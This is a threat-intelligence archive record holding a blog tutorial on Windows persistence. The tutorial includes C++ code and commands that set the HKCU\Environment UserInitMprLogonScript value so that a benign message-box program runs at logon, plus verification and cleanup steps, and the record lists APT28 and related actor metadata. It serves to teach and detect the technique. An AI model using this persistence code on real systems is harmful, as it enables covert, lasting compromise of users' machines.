{ "id": "fa255bb5-e627-4b18-b445-33eb6bf31fd7", "created_at": "2026-04-06T00:17:31.034423Z", "updated_at": "2026-04-10T03:36:59.181691Z", "deleted_at": null, "sha1_hash": "261de8391c031ac0d2b1d0ff92f40a479f7d8deb", "title": "Malware development: persistence - part 20. UserInitMprLogonScript (Logon Script). Simple C++ example.", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 4447357, "plain_text": "Malware development: persistence - part 20.\r\nUserInitMprLogonScript (Logon Script). Simple C++ example.\r\nBy cocomelonc\r\nPublished: 2022-12-09 · Archived: 2026-04-05 20:33:04 UTC\r\n2 minute read\r\n﷽\r\nHello, cybersecurity enthusiasts and white hackers!\r\nThis post is based on my own research into one of the more interesting malware persistence tricks: via\r\nUserInitMprLogonScript value.\r\nUserInitMprLogonScriptPermalink\r\nWindows enables the execution of logon scripts whenever a user or group of users logs into a system. Adding a\r\nscript’s path to the HKCU\\Environment\\UserInitMprLogonScript Registry key accomplishes this. So, to establish\r\npersistence, hackers may utilize Windows logon scripts automatically executed upon logon initialization.\r\npractical examplePermalink\r\nhttps://cocomelonc.github.io/persistence/2022/12/09/malware-pers-20.html\r\nPage 1 of 12\n\nLet’s go to look at a practical example. First of all, as usually, create “evil” application. For simplicity, as usually,\r\nit’s meow-meow messagebox application ( hack.cpp ):\r\n/*\r\nhack.cpp\r\nevil app for windows persistence\r\nauthor: @cocomelonc\r\nhttps://cocomelonc.github.io/malware/2022/12/09/malware-pers-20.html\r\n*/\r\n#include \u003cwindows.h\u003e\r\n#pragma comment (lib, \"user32.lib\")\r\nint WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {\r\n MessageBox(NULL, \"Meow-meow!\", \"=^..^=\", MB_OK);\r\n return 0;\r\n}\r\nAnd, then just create persistence script ( pers.cpp ):\r\n/*\r\npers.cpp\r\nwindows persistence via\r\nsetting UserInitMprLogonScript value\r\nauthor: @cocomelonc\r\nhttps://cocomelonc.github.io/malware/2022/12/09/malware-pers-20.html\r\n*/\r\n#include \u003cwindows.h\u003e\r\n#include \u003cstring.h\u003e\r\nint main(int argc, char* argv[]) {\r\n HKEY hkey = NULL;\r\n // env\r\n const char* env = \"Environment\";\r\n // evil app\r\n const char* exe = \"Z:\\\\2022-12-09-malware-pers-20\\\\hack.exe\";\r\n // environment\r\n LONG res = RegOpenKeyEx(HKEY_CURRENT_USER, (LPCSTR)env, 0 , KEY_WRITE, \u0026hkey);\r\n if (res == ERROR_SUCCESS) {\r\n // update registry key value\r\n // reg add \"HKEY_CURRENT_USER\\Environment\" /v \"UserInitMprLogonScript\" /t REG_SZ /d \"...\\hack.exe\" /f\r\n RegSetValueEx(hkey, (LPCSTR)\"UserInitMprLogonScript\", 0, REG_SZ, (unsigned char*)exe, strlen(exe));\r\n RegCloseKey(hkey);\r\n }\r\nhttps://cocomelonc.github.io/persistence/2022/12/09/malware-pers-20.html\r\nPage 2 of 12\n\nreturn 0;\r\n}\r\nAs you can see, the logic is simple. Just set UserInitMprLogonScript key value under HKCU\\Environment to the\r\nfull path of our “malware” - Z:\\\\2022-12-09-malware-pers-20\\hack.exe .\r\ndemoPermalink\r\nLet’s go to see everything in action. First of all, check Registry:\r\nreg query \"HKCU\\Environment\" /s\r\nThen, compile our “malware” at the attacker’s machine ( kali ):\r\nx86_64-w64-mingw32-g++ -O2 hack.cpp -o hack.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-s\r\nAnd for checking correctness, try to run hack.exe at the victim’s machine ( Windows 10 x64 in my case):\r\n.\\hack.exe\r\nhttps://cocomelonc.github.io/persistence/2022/12/09/malware-pers-20.html\r\nPage 3 of 12\n\nAs you can see, our “malware” works perfectly.\r\nAt the next step, let’s go to compile our persistence script at the attacker’s machine:\r\nx86_64-w64-mingw32-g++ -O2 pers.cpp -o pers.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-s\r\nAnd run it at the attacker’s machine:\r\n.\\pers.exe\r\nThen, check our Registry key values again:\r\nreg query \"HKCU\\Environment\" /s\r\nhttps://cocomelonc.github.io/persistence/2022/12/09/malware-pers-20.html\r\nPage 4 of 12\n\nSo, as you can see, the key ( UserInitMprLogonScript ) value is set.\r\nThat’s all. Try to logout and login:\r\nhttps://cocomelonc.github.io/persistence/2022/12/09/malware-pers-20.html\r\nPage 5 of 12\n\nhttps://cocomelonc.github.io/persistence/2022/12/09/malware-pers-20.html\r\nPage 6 of 12\n\nAnd after a few milliseconds, our “malware”, meow-meow popped up:\r\nhttps://cocomelonc.github.io/persistence/2022/12/09/malware-pers-20.html\r\nPage 7 of 12\n\nThen, if we open Process Hacker and check hack.exe properties:\r\nhttps://cocomelonc.github.io/persistence/2022/12/09/malware-pers-20.html\r\nPage 8 of 12\n\nhttps://cocomelonc.github.io/persistence/2022/12/09/malware-pers-20.html\r\nPage 9 of 12\n\nwe see that the parent process is “non-existent” process.\r\nIf you have studied the windows internals at least a little, you know that exists processes which have “non-existent” process as parent. For example, Windows Explorer - explorer.exe . Parent process is userinit.exe\r\nor winlogon.exe , but can be anything .exe using explorer.exe . Parent will show as \u003cNon-existent\r\nProcess\u003e since userinit.exe terminates itself. Another example is Windows Logon - winlogon.exe . Parent is\r\n“does not exist” since smss.exe exits.\r\nIf we check hack.exe properties via Sysinternals Process Explorer, we can see “Autostart Location” value:\r\nhttps://cocomelonc.github.io/persistence/2022/12/09/malware-pers-20.html\r\nPage 10 of 12\n\nEverything is worked perfectly! =^..^=\r\nAfter the end of experiment, delete the key:\r\nRemove-ItemProperty -Path \"HKCU:\\Environment\" -Name \"UserInitMprLogonScript\"\r\nhttps://cocomelonc.github.io/persistence/2022/12/09/malware-pers-20.html\r\nPage 11 of 12\n\nThis persistence trick is used by APT28 group and software like Attor and Zebrocy at the wild.\r\nI hope this post spreads awareness to the blue teamers of this interesting technique, and adds a weapon to the red\r\nteamers arsenal.\r\nThis is a practical case for educational purposes only.\r\nSysinternals Process Explorer\r\nMalware persistence: part 1\r\nAPT28\r\nAttor\r\nZebrocy (Trojan)\r\nsource code in github\r\nThanks for your time happy hacking and good bye!\r\nPS. All drawings and screenshots are mine\r\nSource: https://cocomelonc.github.io/persistence/2022/12/09/malware-pers-20.html\r\nhttps://cocomelonc.github.io/persistence/2022/12/09/malware-pers-20.html\r\nPage 12 of 12\n\n https://cocomelonc.github.io/persistence/2022/12/09/malware-pers-20.html \nSo, as you can see, the key ( UserInitMprLogonScript ) value is set.\nThat’s all. Try to logout and login: \n Page 5 of 12", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://cocomelonc.github.io/persistence/2022/12/09/malware-pers-20.html" ], "report_names": [ "malware-pers-20.html" ], "threat_actors": [ { "id": "a76ba723-d744-472a-b683-19d80e105d9f", "created_at": "2023-01-06T13:46:39.089347Z", "updated_at": "2026-04-10T02:00:03.209505Z", "deleted_at": null, "main_name": "Attor", "aliases": [], "source_name": "MISPGALAXY:Attor", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "730dfa6e-572d-473c-9267-ea1597d1a42b", "created_at": "2023-01-06T13:46:38.389985Z", "updated_at": "2026-04-10T02:00:02.954105Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "Pawn Storm", "ATK5", "Fighting Ursa", "Blue Athena", "TA422", "T-APT-12", "APT-C-20", "UAC-0001", "IRON TWILIGHT", "SIG40", "UAC-0028", "Sofacy", "BlueDelta", "Fancy Bear", "GruesomeLarch", "Group 74", "ITG05", "FROZENLAKE", "Forest Blizzard", "FANCY BEAR", "Sednit", "SNAKEMACKEREL", "Tsar Team", "TG-4127", "STRONTIUM", "Grizzly Steppe", "G0007" ], "source_name": "MISPGALAXY:APT28", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e3767160-695d-4360-8b2e-d5274db3f7cd", "created_at": "2022-10-25T16:47:55.914348Z", "updated_at": "2026-04-10T02:00:03.610018Z", "deleted_at": null, "main_name": "IRON TWILIGHT", "aliases": [ "APT28 ", "ATK5 ", "Blue Athena ", "BlueDelta ", "FROZENLAKE ", "Fancy Bear ", "Fighting Ursa ", "Forest Blizzard ", "GRAPHITE ", "Group 74 ", "PawnStorm ", "STRONTIUM ", "Sednit ", "Snakemackerel ", "Sofacy ", "TA422 ", "TG-4127 ", "Tsar Team ", "UAC-0001 " ], "source_name": "Secureworks:IRON TWILIGHT", "tools": [ "Downdelph", "EVILTOSS", "SEDUPLOADER", "SHARPFRONT" ], "source_id": "Secureworks", "reports": null }, { "id": "ae320ed7-9a63-42ed-944b-44ada7313495", "created_at": "2022-10-25T15:50:23.671663Z", "updated_at": "2026-04-10T02:00:05.283292Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "APT28", "IRON TWILIGHT", "SNAKEMACKEREL", "Group 74", "Sednit", "Sofacy", "Pawn Storm", "Fancy Bear", "STRONTIUM", "Tsar Team", "Threat Group-4127", "TG-4127", "Forest Blizzard", "FROZENLAKE", "GruesomeLarch" ], "source_name": "MITRE:APT28", "tools": [ "Wevtutil", "certutil", "Forfiles", "DealersChoice", "Mimikatz", "ADVSTORESHELL", "Komplex", "HIDEDRV", "JHUHUGIT", "Koadic", "Winexe", "cipher.exe", "XTunnel", "Drovorub", "CORESHELL", "OLDBAIT", "Downdelph", "XAgentOSX", "USBStealer", "Zebrocy", "reGeorg", "Fysbis", "LoJax" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434651, "ts_updated_at": 1775792219, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/261de8391c031ac0d2b1d0ff92f40a479f7d8deb.pdf", "text": "https://archive.orkl.eu/261de8391c031ac0d2b1d0ff92f40a479f7d8deb.txt", "img": "https://archive.orkl.eu/261de8391c031ac0d2b1d0ff92f40a479f7d8deb.jpg" } }